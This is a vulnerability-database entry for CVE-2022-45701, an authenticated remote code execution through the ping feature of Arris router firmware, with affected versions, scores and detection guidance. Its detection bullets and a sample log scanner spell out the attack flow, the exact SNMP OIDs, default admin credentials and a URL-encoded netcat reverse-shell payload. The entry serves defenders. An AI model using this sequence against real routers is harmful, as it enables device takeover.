CVE-2022-45701
Published 2023-02-17
CVE-2022-45701: Arris TG2482A firmware through 9.1.103GEM9 allows Remote Code Execution (RCE) via the ping utility feature.
Priority: P2 (75), high, CVSS 3.1: 8.8
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 45.31% (98.6th percentile)
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| commscope | arris_sbg10_firmware | <= 9.1.103 | — |
| commscope | arris_tg2482a_firmware | <= 9.1.103 | — |
| commscope | arris_tg2492_firmware | <= 9.1.103 | — |
Detection & IOCs (extracted from sources)
- Monitor HTTP GET requests to the /snmpSet endpoint on Arris routers with OID parameters from the 1.3.6.1.4.1.4115.1.20.1.1.7.* subtree, especially OID .7.2.0 containing shell metacharacters or URL-encoded command injection strings (e.g., %20-e%20/bin/sh).
- Detect HTTP GET requests to /login with an 'arg' query parameter containing a base64-encoded credential string, followed immediately by requests to /snmpSet with a 'credential' cookie; this sequence is characteristic of the exploit authentication flow.
- Alert on URL-encoded netcat reverse shell patterns in HTTP query parameters targeting router management interfaces: look for 'nc%20' combined with '%20-e%20/bin/sh' in GET request URIs.
- Flag sequential SNMP-over-HTTP SET operations to OIDs 1.3.6.1.4.1.4115.1.20.1.1.7.1.0 through .9.0 in rapid succession via GET /snmpSet, as this is the exact OID sequence used to arm and trigger the ping-based RCE.
- The exploit requires prior authentication (valid admin credentials). The default credentials used in the PoC are admin:password; deployments using default credentials are immediately exploitable.
- The exploit was tested against multiple Arris device models (TG2482A, TG2492, SBG10), so detection rules should not be scoped to a single model.
- The RCE is delivered via the router's ping utility feature through SNMP OID manipulation over HTTP, not through a traditional SNMP UDP port, so network-layer SNMP filtering alone will not block this attack vector.
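The request patterns in the list above, combined into one scan over web access logs. This is an added example, not code from this page or from the referenced PoC; the log layout, the query-string layout, the thresholds and the sample lines are constructed assumptions, and the 'credential' cookie is not checked because typical access logs omit cookies.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Ping-utility OID subtree named in the list above; group 1 is the index.
PING_OID = re.compile(r"1\.3\.6\.1\.4\.1\.4115\.1\.20\.1\.1\.7\.(\d+)\.0")
# Strings that have no place in a ping target (checked after URL-decoding).
SHELL = re.compile(r"/bin/sh|\bnc\s|[`|]|\$\(")
WINDOW = 30  # seconds; assumed correlation window
BURST = 4    # distinct ping OIDs per window; assumed threshold

def scan(lines):
    """Return sorted (client_ip, rule) findings.
    Assumed log layout: '<epoch> <client-ip> <METHOD> <request-uri>'."""
    last_login, oid_hits, findings = {}, defaultdict(list), set()
    for line in lines:
        ts, ip, method, uri = line.split(None, 3)
        ts, path, decoded = int(ts), uri.split("?", 1)[0], unquote(uri)
        if method != "GET":
            continue
        if path == "/login" and re.search(r"[?&]arg=", uri):
            last_login[ip] = ts
        elif path == "/snmpSet":
            if ip in last_login and ts - last_login[ip] <= WINDOW:
                findings.add((ip, "login-then-snmpset"))  # context signal
            oids = PING_OID.findall(decoded)
            if oids and SHELL.search(decoded):
                findings.add((ip, "shell-in-ping-oid"))   # high confidence
            oid_hits[ip] += [(ts, o) for o in oids]
            if len({o for t, o in oid_hits[ip] if ts - t <= WINDOW}) >= BURST:
                findings.add((ip, "ping-oid-burst"))
    return sorted(findings)

# Constructed sample log; query layout and placeholder values are assumptions.
OID = "1.3.6.1.4.1.4115.1.20.1.1"
SAMPLE = [
    "1700000000 10.0.0.5 GET /login?arg=BASE64_PLACEHOLDER",
    f"1700000001 10.0.0.5 GET /snmpSet?oid={OID}.7.1.0=1",
    f"1700000002 10.0.0.5 GET /snmpSet?oid={OID}.7.2.0=nc%20HOST%20PORT%20-e%20/bin/sh",
    f"1700000003 10.0.0.5 GET /snmpSet?oid={OID}.7.3.0=1",
    f"1700000004 10.0.0.5 GET /snmpSet?oid={OID}.7.9.0=1",
    f"1700000050 10.0.0.7 GET /snmpSet?oid={OID}.7.2.0=192.0.2.10",
    f"1700000060 10.0.0.9 GET /snmpSet?oid={OID}.5.1.0=1",
]

if __name__ == "__main__":
    for ip, rule in scan(SAMPLE):
        print(ip, rule)
```

The login-then-snmpset rule will also fire on ordinary administrator sessions, so treat it as context for the other two rules rather than as an alert on its own.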
No detection rules found.
No writeups or analysis indexed.
- http://arris.com
- https://packetstormsecurity.com/files/171001/Arris-Router-Firmware-9.1.103-Remote-Code-Execution.html
- https://github.com/yerodin/CVE-2022-45701